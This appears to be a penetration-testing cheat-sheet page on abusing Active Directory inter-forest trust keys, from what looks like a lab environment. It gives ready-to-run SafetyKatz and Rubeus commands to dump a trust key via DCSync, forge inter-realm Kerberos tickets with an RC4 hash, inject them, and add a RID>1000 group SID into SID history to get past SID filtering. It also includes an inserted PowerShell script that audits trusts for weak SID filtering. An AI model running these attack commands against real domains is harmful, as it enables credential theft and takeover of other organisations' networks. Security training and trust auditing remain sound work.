# trust-key

## Methodology

1. Dump the trust key of the child domain.
2. Check if SID Filtering is enabled.
3. Forge an inter-forest ticket.
4. Inject the ticket.
5. Enumerate group RID > 1000 on the target domain.
6. Forge an inter-forest ticket with special SIDS.
7. Inject the ticket.

## PowerShell

> [!INFO] Remember to follow the PowerShell methodology

## AD Module

**Check if SID Filtering is enabled:**

```powershell
Get-ADTrust -Filter *
```
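`Get-ADTrust -Filter *` only dumps the raw trust objects; the following added audit script (not part of the original page) decodes the `TrustAttributes` bits of each trust and reports whether SID filtering protects it. The bit values are the `TRUST_ATTRIBUTE_*` constants from MS-ADTS, and `Get-TrustSidFilteringReport` is a hypothetical helper name.

```powershell
# Added example: classify every trust of the current domain by SID filtering state.
# Flag values are TRUST_ATTRIBUTE_* from MS-ADTS 6.1.6.7.9 (trustAttributes).
$TrustFlags = [ordered]@{
    NON_TRANSITIVE      = 0x01
    UPLEVEL_ONLY        = 0x02
    QUARANTINED_DOMAIN  = 0x04   # external trust with SID filtering (netdom /quarantine:yes)
    FOREST_TRANSITIVE   = 0x08
    CROSS_ORGANIZATION  = 0x10
    WITHIN_FOREST       = 0x20   # parent/child trust: SID history is not filtered
    TREAT_AS_EXTERNAL   = 0x40   # forest trust honouring SID history (netdom /enablesidhistory:yes)
    USES_RC4_ENCRYPTION = 0x80
}

# Hypothetical helper: turns one Get-ADTrust object into a one-line verdict.
function Get-TrustSidFilteringReport {
    param([Parameter(ValueFromPipeline = $true)] $Trust)
    process {
        $attr  = [int]$Trust.TrustAttributes
        $names = ($TrustFlags.GetEnumerator() |
                  Where-Object { ($attr -band $_.Value) -ne 0 } |
                  ForEach-Object { $_.Key }) -join ','

        $verdict = if ($attr -band $TrustFlags.WITHIN_FOREST) {
            'N/A  : intra-forest trust, SID history is not filtered'
        } elseif ($attr -band $TrustFlags.FOREST_TRANSITIVE) {
            if ($attr -band $TrustFlags.TREAT_AS_EXTERNAL) {
                # Only SIDs with RID < 1000 of the trusting domain are still dropped,
                # which is exactly why the methodology above looks for groups with RID > 1000.
                'WEAK : forest trust honours SID history (treat-as-external)'
            } else {
                'OK   : forest trust, SID filtering active'
            }
        } elseif ($attr -band $TrustFlags.QUARANTINED_DOMAIN) {
            'OK   : external trust is quarantined (SID filtering active)'
        } else {
            'WEAK : external trust without SID filtering quarantine'
        }

        [pscustomobject]@{
            Trust        = $Trust.Name
            Direction    = $Trust.Direction
            Flags        = $names
            SidFiltering = $verdict
        }
    }
}

# Audit all trusts and list the weak ones first.
Get-ADTrust -Filter * |
    Get-TrustSidFilteringReport |
    Sort-Object { $_.SidFiltering -notlike 'WEAK*' } |
    Format-Table -AutoSize
```

Run it on each domain controller in the forest you defend; any `WEAK` line is a trust across which SID history from the other side is accepted.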

**Look for groups with RID higher than 1000 in the target domain:**

```powershell
Get-ADGroup -Filter 'SID -ge "S-1-5-21-4066061358-3942393892-617142613-1000"' -Server euvendor.local
```

## Binaries

> [!INFO] Remember to follow the Binaries methodology

### SafetyKatz

**Dump trust key for the inter-forest trust:**

```batchfile
SafetyKatz.exe '"lsadump::dcsync /user:eu\euvendor$"'
```

### Rubeus

**Forge an inter-realm TGT:**

```batchfile
Rubeus.exe silver /user:Administrator /ldap /service:krbtgt/eu.local /rc4:b96659c7b2109d2e63e6de676d48646c /sid:S-1-5-21-3657428294-2017276338-1274645009 /nowrap
```

**Request a TGS with the inter-realm TGT and inject it:**

```batchfile
Rubeus.exe asktgs /ticket:doIFEzCCBQ /service:CIFS/euvendor-dc.euvendor.local /dc:euvendor-dc.euvendor.local /ptt
```

> [!INFO] We can only access specific resources that are explicitly shared!

**Forge a TGS using inter-realm TGT:**

```batchfile
Rubeus.exe asktgs /service:http/euvendornet.euvendor.local /dc:euvendor-dc.euvendor.local /ptt /ticket:doIFOzCCBT...
```

**Forge an inter-realm TGT carrying the SID of the RID > 1000 group in SID history:**

```batchfile
Rubeus.exe silver /user:Administrator /ldap /service:krbtgt/eu.local /rc4:b96659c7b2109d2e63e6de676d48646c /sids:S-1-5-21-4066061358-3942393892-617142613-1103 /nowrap
```

**Request TGS with the TGT:**

```batchfile
Rubeus.exe asktgs /service:http/euvendornet.euvendor.local /dc:euvendor-dc.euvendor.local /ptt /ticket:doIFOzCCBT...
```
